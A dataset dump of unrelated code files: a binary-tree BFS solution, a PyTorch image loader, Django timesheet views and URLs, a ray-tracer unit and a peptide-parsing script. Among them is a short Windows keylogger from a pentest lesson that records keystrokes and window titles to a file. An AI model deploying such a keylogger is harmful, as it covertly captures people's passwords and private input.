+{"seq_id":"302438054","text":"\"\"\"\nQ199: medium\nBinary tree right side view.\nStatus: finished :)\n\n20210614\n\nBFS\n\nGiven a binary tree, imagine yourself standing on the right side of it,\nreturn the values of the nodes you can see ordered from top to bottom.\n\nExample:\n\nInput: [1,2,3,null,5,null,4]\nOutput: [1, 3, 4]\nExplanation:\n\n 1 <---\n / \\\n2 3 <---\n \\ \\\n 5 4 <---\n\n\"\"\"\nfrom typing import List\nfrom collections import deque\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def rightSideView(self, root: TreeNode) -> List[int]:\n\n if not root:\n return []\n right_view = []\n from collections import deque\n queue = deque([(root, 0)])\n\n while queue:\n curr, level = queue.popleft()\n if level + 1 > len(right_view):\n right_view.append(curr.val)\n else:\n right_view[level] = curr.val\n\n if curr.left:\n queue.append((curr.left, level+1))\n if curr.right:\n queue.append((curr.right, level+1))\n\n return right_view\n\n\n\n\n\n","sub_path":"Q199-3.py","file_name":"Q199-3.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"268797857","text":"import torch\nimport torchvision\nfrom torch.utils.data import DataLoader, Dataset\nfrom PIL import Image\nimport zipfile\nfrom io import BytesIO\nimport numpy as np\nimport gc\nfrom tqdm import tqdm\n\n'''\n1. This is dataset to read image from ZIP file\n2. reading is done once during ojject creation and store inot RAM. this help to avoid reading during getitem and speedup training time.\n3. as this load all images into RAM, this class is suitable for limited dataset size that fit into RAM\nCreating custom dataset class by inherting torch.utils.data.Dataset and overide following methods:\n1. __len__ : returns the size of the dataset\n2. __getitem__: to support indexing such that dataset[i] can be used to get the sample\n\nreferenced material: https://pytorch.org/tutorials/beginner/data_loading_tutorial.html\n'''\nclass DepthMapDatasetZip(Dataset):\n \"\"\" Depth Map dataset\"\"\"\n def __init__(self, zf_dict, im_files, bg_transform=None, fgbg_transform=None, mask_transform=None, depth_transform=None):\n \"\"\"\n Args:\n zf_dict (dict): zip file resources for all dataset with items names : \"bg\", \"fgbg\", \"mask\" and \"depth\"\n im_files: list of file to be loaded into memory (file name format: fg001_bg001_10.jpg)\n data_transform (callable, optional): optional transform to be applied on bg and fgbg images \n target_transform (callable, optional): optional transform to be applied on mask and depth images. these are ground truth\n\n NOTE: zip file resources shall be open and closed by the user\n \"\"\"\n self.zf_dict = zf_dict\n\n self.bg_transform = bg_transform\n self.fgbg_transform = fgbg_transform\n self.mask_transform = mask_transform\n self.depth_transform = depth_transform\n\n # fgbg, mask and depth retain the same file names\n self.im_files = im_files\n\n '''\n keeping all the data loaded and applied data transformation as well. 
\n doing so mean data is already ready and __getitem__ fxn will be fast during training \n '''\n self.fgbg_data = self.load_data(zf_dict[\"fgbg\"], self.fgbg_transform, kind=\"fgbg\")\n self.mask_data = self.load_data(zf_dict[\"mask\"], self.mask_transform, kind=\"mask\")\n self.depth_data = self.load_data(zf_dict[\"depth\"], self.depth_transform, kind=\"depth\")\n self.bg_data = self.load_bg_data(zf_dict[\"bg\"], self.bg_transform, kind=\"bg\")\n\n def __len__(self):\n return len(self.im_files)\n\n def __getitem__(self, idx):\n\n if(torch.is_tensor(idx)):\n idx = idx.tolist()\n \n # format fgxxx_bgxxx_xx.jpg\n filename = self.im_files[idx]\n\n # for fgbg, mask and depth all its image data are loaded on same index location\n im_fgbg = self.fgbg_data[idx]\n im_mask = self.mask_data[idx]\n im_depth = self.depth_data[idx]\n \n # load bg data\n bg_idx = np.uint8(filename.split(\"_\")[1][2:]) # get bg num from the file name\n im_bg = self.bg_data[bg_idx-1]\n\n sample = {\"bg\": im_bg, \"fgbg\": im_fgbg, \"mask\": im_mask, \"depth\": im_depth}\n return sample\n\n def read_image_from_zip(self, zf, filename):\n data = zf.read(filename)\n dataEnc = BytesIO(data)\n img = Image.open(dataEnc)\n del data\n del dataEnc\n return img\n\n def load_data(self, zf, transform, kind):\n load_images = []\n pbar = tqdm(self.im_files)\n for file in pbar:\n im = self.read_image_from_zip(zf, file)\n if transform is not None:\n im = transform(im)\n load_images.append(im)\n pbar.set_description(desc= f'Loading {kind} Data: ')\n gc.collect() # free unused memory\n return load_images\n\n '''\n gb have files with names as img_xxx.jpg(001 to 100)\n currently all the 100 bg images ae loaded so that we can directly access bg image throuhg its index number(1-100)\n later we can optimize it to load only relevent number of images..\n right max over head is instead of loading 100 images we are loading 200 (100 each for train and test data set, just to reduce time complexcity)\n '''\n def load_bg_data(self, zf, transform, kind):\n load_images = []\n pbar = tqdm(np.arange(1,101))\n for idx in pbar:\n filename = f'img_{idx:03d}.jpg'\n im = self.read_image_from_zip(zf, filename)\n if transform is not None:\n im = transform(im)\n load_images.append(im)\n pbar.set_description(desc= f'Loading {kind} Data: ')\n return load_images\n\n def get_count(self):\n ds_cnt = {\"bg\": len(self.bg_data), \n \"fg_bg\": len(self.fgbg_data),\n \"fg_bg_mask\": len(self.mask_data),\n \"fg_bg_depth\": len(self.depth_data)}\n return ds_cnt\n\n'''\n1. Dataset to read images from folder\n2. this will slow the training as every time getitem is called image is read from file system\n3. as all images are not loaded at once in RAM, so suitable to training large dataset\n\nCreating custom dataset class by inherting torch.utils.data.Dataset and overide following methods:\n1. __len__ : returns the size of the dataset\n2. 
__getitem__: to support indexing such that dataset[i] can be used to get the sample\n\nreferenced material: https://pytorch.org/tutorials/beginner/data_loading_tutorial.html\n'''\nclass DepthMapDatasetFolder(Dataset):\n \"\"\" Depth Map dataset\"\"\"\n def __init__(self, ds_folder_dict, im_files, bg_transform=None, fgbg_transform=None, mask_transform=None, depth_transform=None):\n \"\"\"\n Args:\n img_folders (dict): items names : \"bg\", \"fgbg\", \"mask\" and \"depth\"\n im_files: image filename list for the dataset(file name format: fg001_bg001_10.jpg)\n xxxx_transform (callable, optional): optional transform to be applied on respective image kind \n \"\"\"\n self.ds_folder_dict = ds_folder_dict\n\n self.bg_transform = bg_transform\n self.fgbg_transform = fgbg_transform\n self.mask_transform = mask_transform\n self.depth_transform = depth_transform\n\n #fgbg, mask and depth retain the same file names. bg file name to be retrieve from this image file name\n self.im_files = im_files \n\n def __len__(self):\n return len(self.im_files)\n\n def __getitem__(self, idx):\n\n if(torch.is_tensor(idx)):\n idx = idx.tolist()\n\n im_fgbg = self.load_data(f'{self.ds_folder_dict[\"fgbg\"]}/{self.im_files[idx]}', self.fgbg_transform)\n im_mask = self.load_data(f'{self.ds_folder_dict[\"mask\"]}/{self.im_files[idx]}', self.mask_transform)\n im_depth = self.load_data(f'{self.ds_folder_dict[\"depth\"]}/{self.im_files[idx]}', self.depth_transform)\n \n # load bg data: read gb num from : format fgxxx_bgxxx_xx.jpg\n #bg_num = np.uint8(self.im_files[idx].split(\"_\")[1][2:]) # get bg num from the file name\n #im_bg = self.load_data(f'{self.ds_folder_dict[\"bg\"]}/img_{bg_num:03d}.jpg', self.depth_transform)\n \n bg_num = self.im_files[idx].split(\"_\")[1][2:] # get bg num from the file name\n im_bg = self.load_data(f'{self.ds_folder_dict[\"bg\"]}/img_{bg_num}.jpg', self.bg_transform)\n\n sample = {\"bg\": im_bg, \"fgbg\": im_fgbg, \"mask\": im_mask, \"depth\": im_depth}\n return sample\n\n def load_data(self, filename, transform):\n im = Image.open(filename)\n if transform is not None:\n im = transform(im)\n return im\n \nclass DepthMapDatasetFxn():\n def __init__(self):\n self.dum = 0\n\n def get_random_filelist(self, im_files):\n idx_list = np.arange(len(im_files))\n np.random.shuffle(idx_list)\n shuffled_im_files = [im_files[idx] for idx in idx_list]\n return shuffled_im_files\n\n def train_test_split(self, im_files, test_size=0.3):\n idx_list = np.arange(len(im_files))\n np.random.shuffle(idx_list)\n shuffle_im_files = [im_files[idx] for idx in idx_list]\n n_train = int(np.round((1-test_size)*len(im_files)))\n return shuffle_im_files[:n_train], shuffle_im_files[n_train:]\n\n def save_img_filenames(self, img_name_list, filename):\n # open file and write the content\n with open(filename, 'w') as filehandle:\n filehandle.writelines([f'{name}\\n' for name in img_name_list])\n\n def read_img_filenames(self, filename):\n img_name_list = []\n # open file and read the content in a list\n with open(filename, 'r') as filehandle:\n filecontents = filehandle.readlines()\n for line in filecontents:\n img_name = line[:-1] # remove linebreak which is the last character of the string\n img_name_list.append(img_name) # add item to the list\n return img_name_list","sub_path":"session15/s15_qualifier/utils/DepthMapDataset.py","file_name":"DepthMapDataset.py","file_ext":"py","file_size_in_byte":9086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"638008916","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom calendar import monthrange\nimport csv\nfrom StringIO import StringIO\nfrom django.http import HttpResponse\nfrom django.utils.encoding import smart_str\nfrom django.http import Http404\nfrom django.utils.translation import ugettext as _\nfrom django.views.generic import View, ListView\nfrom django.contrib.auth.views import login, logout\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import FormView\nfrom models import ListOfStaff, LosTeacher, LosScientist, OperatingScheduleWeekly, WorkTime\nfrom .models import Department, Project # REASON_WORK\nfrom datetime import datetime, date, timedelta, time\nfrom django.db.models import Q\nfrom django.contrib.auth.models import User\nfrom work_registration import start_work, stop_work, cancel_start_work, cancel_stop_work\nfrom django.shortcuts import redirect\nimport pytz\nfrom .forms import TabelDialogForm\nfrom .models import Department, TimeboardPermission\nfrom .tabel import build_tabel_as_tbl, build_actual_time_tabel_as_tbl\n# приклад class view: http://polydoo.com/code/?p=172\n\n\ndef home(request):\n if request.user.is_authenticated():\n user_id = request.user.id\n # cur_date = date.today() # date(2014, 8, 10)\n # cur_time = datetime.now().time()\n # for tz in pytz.all_timezones: print tz\n\n cur_date_time = datetime.now(pytz.timezone('Europe/Kiev'))\n cur_date = cur_date_time.date()\n cur_time = cur_date_time.time()\n\n\n if request.method == 'POST':\n for name in request.POST:\n if name.startswith('start_'):\n los_id = name.split('_')[1]\n start_work(user_id, los_id, cur_date, cur_time)\n return redirect('/home/', permanent=True)\n elif name.startswith('stop_'):\n worktime_id = name.split('_')[1]\n stop_work(user_id, worktime_id, cur_date, cur_time)\n return redirect('/home/', permanent=True)\n elif name.startswith('cancelstop_'):\n worktime_id = name.split('_')[1]\n cancel_stop_work(worktime_id)\n return redirect('/home/', permanent=True)\n elif name.startswith('cancelstart_'):\n worktime_id = name.split('_')[1]\n cancel_start_work(worktime_id)\n return redirect('/home/', permanent=True)\n\n timeboard_lst = read_user_timeboard(user_id, cur_date)\n\n return render(request, 'home.html', {'timeboard': timeboard_lst})\n else:\n return login_user(request)\n\n\ndef worktime(request):\n if request.user.is_authenticated():\n user_id = request.user.id\n\n return render(request, 'worktime.html')\n else:\n return login_user(request)\n\n\nclass TabelDialogView(FormView):\n template_name = 'tabel_dialog.html'\n success_url = '/tabel/'\n form_class = TabelDialogForm\n\n\n def dispatch(self, request, *args, **kwargs):\n if request.user.is_authenticated():\n return super(TabelDialogView, self).dispatch(request, *args, **kwargs)\n else:\n return login_user(request)\n\n def form_valid(self, form):\n tabel_parms = self.extract_tabel_parms(form.cleaned_data)\n url_txt = self.build_tabel_url(tabel_parms)\n return redirect(url_txt)\n\n def extract_tabel_parms(self, form_data):\n # dept_code, is_staffer, year_num, month_num, is_first_half_of_month\n\n dept_code, proj_code = form_data['department'].split(',')\n return {'dept_code': dept_code,\n 'proj_code': proj_code,\n 'is_staffer': form_data['is_staffer'],\n 'year_num': form_data['year_num'],\n 'month_num': form_data['month_num'],\n 'is_first_half_of_month': 
form_data['is_first_half_of_month'],\n 'user_id': self.request.user.id\n }\n\n def build_tabel_url(self, tabel_parms):\n # dept_code, is_staffer, year_num, month_num, is_first_half_of_month\n user_id = tabel_parms['user_id']\n if self.has_user_permission(user_id):\n url = '/tabel/%(dept_code)s/%(proj_code)s/%(is_staffer)i/%(year_num)i/%(month_num)s' \\\n '/%(is_first_half_of_month)i/0' % tabel_parms\n else:\n url = '/tabel/%(dept_code)s/%(proj_code)s/%(is_staffer)i/%(year_num)i/%(month_num)s' \\\n '/%(is_first_half_of_month)i/%(user_id)s' % tabel_parms\n return url\n\n def has_user_permission(self, user_id):\n rs = TimeboardPermission.objects.filter(user=user_id)\n if rs.count() == 0:\n return False\n else:\n return True\n\n def get_form_kwargs(self):\n \"\"\"\n Returns the keyword arguments for instantiating the form TabelDialogForm.\n \"\"\"\n kwargs = super(TabelDialogView, self).get_form_kwargs()\n user_id = self.request.user.id\n departments = self.get_departments(user_id)\n kwargs['departments'] = departments\n return kwargs\n\n def get_departments(self, user_id):\n rs = Department.objects.raw(\"\"\"\n select D.id,\n D.dept_name,\n PR.id as proj_id,\n PR.project_title,\n P.user_id\n from tb_department D join tb_timeboard_permission P on P.department_id = D.id\n left outer join tb_project PR on PR.department_id = D.id\n where P.user_id = %s\n \"\"\", (user_id,))\n\n # depts = [('%d,%d' % (r.id, r.proj_id if r.proj_id is not None else 0),\n # r.dept_name + ('; ' + r.project_title if r.project_title is not None else ''))\n # for r in rs]\n\n depts = self.get_depts_lst(rs)\n\n if len(depts) == 0:\n rs = Department.objects.raw(\"\"\"\n select D.id, D.dept_name, PR.id as proj_id, PR.project_title, S.user_id\n from tb_department D join tb_list_of_staff S on S.department_id = D.id\n left outer join tb_project PR on PR.department_id = D.id\n where S.user_id = %s\n \"\"\", (user_id,))\n depts = self.get_depts_lst(rs)\n\n return depts\n\n def get_depts_lst(self, rs):\n depts = [('%d,%d' % (r.id, r.proj_id if r.proj_id is not None else 0),\n r.dept_name + ('; ' + r.project_title if r.project_title is not None else ''))\n for r in rs]\n return depts\n\n\nclass WorktimeDialogView(TabelDialogView):\n template_name = 'worktime_dialog.html'\n success_url = '/worktime/'\n\n def build_tabel_url(self, tabel_parms):\n # dept_code, is_staffer, year_num, month_num, is_first_half_of_month\n user_id = tabel_parms['user_id']\n if self.has_user_permission(user_id):\n url = '/worktime/%(dept_code)s/%(proj_code)s/%(is_staffer)i/%(year_num)i/%(month_num)s' \\\n '/%(is_first_half_of_month)i/0' % tabel_parms\n else:\n url = '/worktime/%(dept_code)s/%(proj_code)s/%(is_staffer)i/%(year_num)i/%(month_num)s' \\\n '/%(is_first_half_of_month)i/%(user_id)s' % tabel_parms\n return url\n\n\nclass TabelListView(ListView):\n template_name = 'tabel.html'\n context_object_name = 'tabel_lst'\n\n def post(self, request, *args, **kwargs):\n self.object_list = self.get_queryset()\n allow_empty = self.get_allow_empty()\n\n # if not allow_empty:\n # # When pagination is enabled and object_list is a queryset,\n # # it's better to do a cheap query than to load the unpaginated\n # # queryset in memory.\n # if (self.get_paginate_by(self.object_list) is not None\n # and hasattr(self.object_list, 'exists'))\n # is_empty = not self.object_list.exists()\n # else:\n # is_empty = len(self.object_list) == 0\n # if is_empty:\n # raise Http404(_(\"Empty list and '%(class_name)s.allow_empty' is False.\") % {'class_name': 
self.__class__.__name__})\n\n context = self.get_context_data()\n\n tabel_name = 'october_tabel'\n\n response = HttpResponse(mimetype='application/ms-excel')\n response['Content-Disposition'] = 'attachment; filename=%s.csv' % tabel_name\n writer = csv.writer(response, csv.excel)\n response.write(u'\\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)\n\n writer.writerow(10*[' '] + [smart_str(u\"Табель\")])\n writer.writerow(10*[' '] + [smart_str(context['tabel_date'])])\n writer.writerow(10*[' '] + [smart_str(context['dept_name'])])\n if 'proj_name' in context:\n writer.writerow(10*[' '] + [smart_str(u'б.т. ') + smart_str(context['proj_name'])])\n writer.writerow([])\n writer.writerow([\n smart_str(u'ФІО'),\n smart_str(u'Посада')] +\n context['day_num_lst'] +\n [smart_str(u'Всього'),\n smart_str(u'Годин'),\n smart_str(u'Вихідних'),\n smart_str(u'В'),\n smart_str(u'Н'),\n smart_str(u'НА'),\n smart_str(u'Д'),\n smart_str(u'ДО'),\n smart_str(u'Ч'),\n smart_str(u'ВП'),\n smart_str(u'ДД'),\n smart_str(u'ТН'),\n smart_str(u'НН'),\n smart_str(u'ПР'),\n smart_str(u'ІН'),\n smart_str(u'ВД'),\n smart_str(u'ВБ'),\n ]\n )\n for r in context['tabel_lst']:\n writer.writerow([smart_str(r['fio']), smart_str(r['appoint_name'])] +\n [smart_str(d) for d in r['days_lst']] +\n [\n self.get_ttl_val(r['totals_dic'], 'WORK', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'WORK', 'hours_cnt'),\n self.get_ttl_val(r['totals_dic'], 'WEEKEND', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'V', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'N', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'NA', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'D', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'DO', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'CH', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'VP', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'DD', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'TN', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'NN', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'PR', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'IN', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'VD', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'VB', 'days_cnt'),\n ]\n )\n\n writer.writerow([])\n writer.writerow([smart_str(u'Відпустка чергова В')])\n writer.writerow([smart_str(u'Відпустка учбова Н')])\n writer.writerow([smart_str(u'Відпустка без оплати НА')])\n writer.writerow([smart_str(u'Відпустка додаткова Д')])\n writer.writerow([smart_str(u'Відпустка додаткова працівникам, які мають дітей ДО')])\n writer.writerow([smart_str(u'Відпустка чорнобильська Ч')])\n writer.writerow([smart_str(u'Відпустка по догляду за дитиною до 3 років ВП')])\n writer.writerow([smart_str(u'Відпустка по догляду за дитиною більше 6 років ДД')])\n writer.writerow([smart_str(u'Тимчасова непрацездатність ТН')])\n writer.writerow([smart_str(u'Неоплачена тимчасова непрацездатність НН')])\n writer.writerow([smart_str(u'Прогули ПР')])\n writer.writerow([smart_str(u'Відгули ІН')])\n writer.writerow([smart_str(u'Відрядження ВД')])\n writer.writerow([smart_str(u'Відрядження без оплати ВБ')])\n\n\n return response\n\n def get_ttl_val(self, totals_dic, ttl_name, cnt_name):\n if ttl_name in totals_dic:\n return totals_dic[ttl_name][cnt_name]\n else:\n return ''\n\n def get_queryset(self):\n if int(self.kwargs['is_first_half_of_month']) == 0:\n days_cnt = self.month_days_cnt(int(self.kwargs['year_num']), int(self.kwargs['month_num']))\n else:\n days_cnt = 15\n tabel = 
build_tabel_as_tbl(dept_code=int(self.kwargs['dept_code']),\n proj_code=int(self.kwargs['proj_code']),\n year_num=int(self.kwargs['year_num']),\n month_num=int(self.kwargs['month_num']),\n is_staffer=int(self.kwargs['is_staffer']),\n days_cnt=days_cnt,\n user_id=int(self.kwargs['user_code'])\n )\n return tabel\n\n def month_days_cnt(self, year_num, month_num):\n return monthrange(year_num, month_num)[1]\n\n def get_context_data(self, **kwargs):\n\n # dept_code, proj_code, year_num, month_num, is_staffer, is_first_half_of_month\n dept_name = Department.objects.get(pk=self.kwargs['dept_code']).dept_name\n proj_id = int(self.kwargs['proj_code'])\n if proj_id != 0:\n proj_name = Project.objects.get(pk=proj_id)\n else:\n proj_name=None\n\n tabel_date_str = self.calc_date(self.kwargs['year_num'], int(self.kwargs['month_num']), int(self.kwargs['is_first_half_of_month']))\n if int(self.kwargs['is_first_half_of_month'])==0:\n days_cnt = self.month_days_cnt(int(self.kwargs['year_num']), int(self.kwargs['month_num']))\n else:\n days_cnt = 15\n\n\n tabel_parms = {'dept_name': dept_name,\n 'proj_name': proj_name,\n 'tabel_date': tabel_date_str,\n 'is_first_half_of_month': int(self.kwargs['is_first_half_of_month']),\n 'is_staffer': int(self.kwargs['is_staffer']),\n 'day_num_lst': range(1, days_cnt+1),\n 'totals_lst': []\n }\n\n context = super(TabelListView, self).get_context_data(**tabel_parms)\n\n return context\n\n # def get_totals(self):\n # pass\n\n def calc_date(self, year_num, month_num, is_first_half_of_month):\n months = [u'січень', u'лютый', u'березень',\n u'квітень', u'травень', u'червень',\n u'липень', u'серпень', u'вересень',\n u'жовтень', u'листопад', u'грудень'\n ]\n\n months2 = [u'січня', u'лютого', u'березня',\n u'квітня', u'травня', u'червня',\n u'липня', u'серпня', u'вересня',\n u'жовтня', u'листопада', u'грудня'\n ]\n\n\n if is_first_half_of_month == 0:\n val = u'за %s %s року' % (months[month_num - 1], year_num)\n else:\n val = u'за першу половину %s %s року' % (months2[month_num - 1], year_num)\n\n return val\n\n\nclass WorktimeListView(TabelListView):\n template_name = 'worktime.html'\n context_object_name = 'worktime_lst'\n\n def get_queryset(self):\n if int(self.kwargs['is_first_half_of_month']) == 0:\n days_cnt = self.month_days_cnt(int(self.kwargs['year_num']), int(self.kwargs['month_num']))\n else:\n days_cnt = 15\n actual_worktime = build_actual_time_tabel_as_tbl(dept_code=int(self.kwargs['dept_code']),\n proj_code=int(self.kwargs['proj_code']),\n year_num=int(self.kwargs['year_num']),\n month_num=int(self.kwargs['month_num']),\n is_staffer=int(self.kwargs['is_staffer']),\n days_cnt=days_cnt,\n user_id=int(self.kwargs['user_code'])\n )\n return actual_worktime\n\n\ndef login_user(request):\n \"\"\"\n Displays the login form for the given HttpRequest.\n \"\"\"\n\n context = {\n 'app_path': '/',\n 'next': '/home',\n }\n # context.update(extra_context or {})\n\n defaults = {\n 'extra_context': context,\n 'current_app': 'timeboard',\n 'authentication_form': AuthenticationForm,\n 'template_name': 'registration/timeboard_login.html',\n }\n return login(request, **defaults)\n\n\ndef logout_user(request):\n logout(request)\n return HttpResponseRedirect(\"/login\")\n\n\ndef read_user_month_timeboard(user_id, year_num, month_num):\n user = User.objects.get(pk=user_id)\n month_timeboard = {'user_name': '%s %s' % (user.last_name, user.first_name),\n 'year_num': year_num,\n 'month_num': month_num,\n 'month_works': None\n \n }\n\n return month_timeboard\n\n\ndef 
get_month_all_activity(user_id, year_num, month_num):\n    pass\n\n\ndef read_user_timeboard(user_id, date_of_work):\n    \"\"\"\n\n    :param user_id:\n    :param date_of_work:\n    :return:\n    \"\"\"\n    user = User.objects.get(pk=user_id)\n    timeboard = {'user_name': '%s %s' % (user.last_name, user.first_name),\n                 'not_closed_works': job_activity(not_closed_works_qs(user_id, date_of_work)),\n                 # 'all_day_lst': job_activity(all_jobs_all_day_activity_qs(user_id, date_of_work)),\n                 'one_day_lst': one_day_activity_lst(user_id, date_of_work)\n                 }\n\n    return timeboard\n\n\ndef not_closed_works_qs(user_id, date_of_work):\n    return WorkTime.objects.filter(Q(to_date=None) | Q(to_time=None),\n                                   Q(list_of_staff__user=user_id), reason__all_day=False,\n                                   from_date__lt=date_of_work)\n\n\ndef one_day_activity_lst(user_id, date_of_work):\n    los = user_los_qs(user_id)\n    activity_lst = []\n    for job in los:\n        activity = {}\n        activity['department'] = job.department.dept_name\n        activity['position'] = job.appointment.appoint_name\n        activity['id'] = job.pk\n        activity['job_all_day_lst'] = job_activity(one_job_all_day_activity_qs(job, date_of_work))\n        activity['work_schedule'] = job_schedule(job, date_of_work)\n        activity['hourly_job_lst'] = job_activity(one_job_hourly_activity_qs(job, date_of_work))\n\n        activity_lst.append(activity)\n\n    return activity_lst\n\n\ndef user_los_qs(user_id):\n    return ListOfStaff.objects.select_related('department', 'appointment').filter(user=user_id).order_by('staffer')\n\n\ndef one_job_all_day_activity_qs(job_obj, date_of_work):\n    qs = job_obj.worktime_set.filter(Q(to_date__gte=date_of_work) | Q(to_date=None),\n                                     from_date__lte=date_of_work,\n                                     reason__all_day=True)\n\n    return qs\n\n\ndef job_activity(qs):\n    if qs.count() == 0:\n        return None\n    else:\n        activity_lst = [{'id': work.pk,\n                         'from_date': work.from_date,\n                         'from_time': work.from_time,\n                         'to_date': work.to_date,\n                         'to_time': work.to_time,\n                         'reason': work.reason.reason_name\n                         }\n                        for work in qs\n                        ]\n        return activity_lst\n\n\ndef one_job_hourly_activity_qs(job_obj, date_of_work):\n    return job_obj.worktime_set.filter(from_date=date_of_work, reason__all_day=False)\n\n\ndef job_schedule(job_obj, date_of_work):\n    try:\n        schedule = job_obj.operatingscheduleweekly\n        if date_of_work.weekday() <= 4:\n            # mon..fri\n            dayofweek = ['mon', 'tue', 'wed', 'thu', 'fri'][date_of_work.weekday()]\n            dayofweek_title = [u'Понеділок', u'Вівторок', u'Середа', u'Четвер', u'П\\'ятниця'][date_of_work.weekday()]\n            start_work = getattr(schedule, '%s_start' % dayofweek)\n            end_work = getattr(schedule, '%s_end' % dayofweek)\n            start_dinner = getattr(schedule, '%s_dinner' % dayofweek)\n            if start_dinner is not None:\n                end_dinner = (datetime.combine(date.today(), start_dinner) + timedelta(hours=1)).time()\n            else:\n                end_dinner = None\n            work_schedule = {'dayofweek_title': dayofweek_title,\n                             'start_work': start_work,\n                             'end_work': end_work,\n                             'start_dinner': start_dinner,\n                             'end_dinner': end_dinner\n                             }\n        else:\n            work_schedule = None\n    except OperatingScheduleWeekly.DoesNotExist as e:\n        work_schedule = None\n\n    return work_schedule\n","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"86168992","text":"#\r\n# Python para Pentesters\t\t\t \r\n# Desenvolvendo um Keylogger\r\n#\r\n\r\nimport pyHook\r\nimport pythoncom\r\n\r\njanela = None\r\n\r\ndef tecla_pressionada(evento):\r\n\tarquivo = open('log.txt', 'w+') # Salvar os logs\r\n\tglobal janela\r\n\tif evento.WindowName != janela:\r\n\t\tjanela = evento.WindowName\r\n\t\tarquivo.write('\\n' + janela + ' - ' + str(evento.Time) + '\\n')\r\n\tarquivo.write(chr(evento.Ascii))\r\n\tarquivo.close() # Fechando arquivo\r\n\r\n# Criando um gancho:\r\nhook = pyHook.HookManager()\r\nhook.Keydown = tecla_pressionada \t\t# Sempre que alguém pressionar uma tecla a função evento é chamada\r\nhook.HookKeyboard() \t\t\t\t# Captura o que foi digitado\r\npythoncom.PumpMessages() \t\t\t# Cria um looping infinito dos eventos realizados no SO\r\n\r\n","sub_path":"Anotações/Módulo 7 - Malwares/2. Desenvolvendo um Keylogger.py","file_name":"2. Desenvolvendo um Keylogger.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"56439602","text":"import math\r\nimport IceRayCpp\r\n\r\ndef name( ):\r\n return \"box\"\r\n\r\ndef make(\r\n #P_len = (math.sqrt(5)-1)/2 \r\n P_len = 1\r\n ): # P_lo, P_hi\r\n lo = IceRayCpp.MathTypeCoord3D()\r\n lo[0] = -P_len\r\n lo[1] = -P_len\r\n lo[2] = -P_len\r\n\r\n hi = IceRayCpp.MathTypeCoord3D()\r\n hi[0] = P_len\r\n hi[1] = P_len\r\n hi[2] = P_len\r\n\r\n box3 = IceRayCpp.GeometrySimpleBox( lo, hi )\r\n\r\n return { 'this': box3 }\r\n","sub_path":"example/test/core/geometry/simple/box/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"650571662","text":"import os\nFs = os.listdir('.')\nD = {}\nfor F in Fs:\n if F[-4:] == '-pep':\n inFile = open(F)\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n spec = fields[0].split()[0]\n pep = fields[1]\n D.setdefault(pep, [])\n D[pep].append(spec)\n inFile.close()\n\nouFile = open('Peptides-pFind', 'w')\nfor k in D:\n ouFile.write(k + '\\t' + '\\t'.join(D[k]) + '\\n')\nouFile.close()\n","sub_path":"NonSynonymous-SNV-Hetrozygous/pFind-First/peptdes-pfind.py","file_name":"peptdes-pfind.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"294995674","text":"from django.urls import include, path\n\nfrom . import views\n\nurlpatterns = [\n # pomocnicze\n path('def/', views.leftSideDef, name=\"def\"),\n path('', views.welPage, name=\"main\"),\n # posty\n path('putPost/', views.putPost, name='putPost'),\n path('postCreate/', views.postCreate, name=\"postCreate\"),\n path('post/', views.putPost, name=\"post\"),\n path('postDelete/', views.postDelete, name=\"postDelete\"),\n # grupy i itemy\n path('itemGroups/', views.groupOfItmesView, name=\"groups\"),\n path('groups//', views.detailOfGroup, name=\"detail\"),\n path('addGroup/', views.addGroup, name=\"groupCreate\"),\n path('itemGroups/groupDelete/', views.groupDelete, name=\"groupDelete\"),\n path('addItem/', views.addItem, name=\"addItem\"),\n path('deleteItem///', views.deleteItem, name=\"deleteItem\"),\n path('plusItem///', views.addOneUnit, name=\"plusItem\"),\n path('minusItem///', views.minusOneUnit, name=\"minusItem\"),\n # grafiki\n path('schedule/', views.putSchedule, name=\"schedule\"),\n path('addFlatMateQ/', views.faltMateListCreate, name=\"cerateFlatMateQ\"),\n path('addSchedule/', views.scheduleCreate, name=\"cerateSchedule\"),\n path('scheduleDelete/', views.scheduleDelete, name=\"scheduleDelete\"),\n path('addFlatMates/', views.addFlateMates, 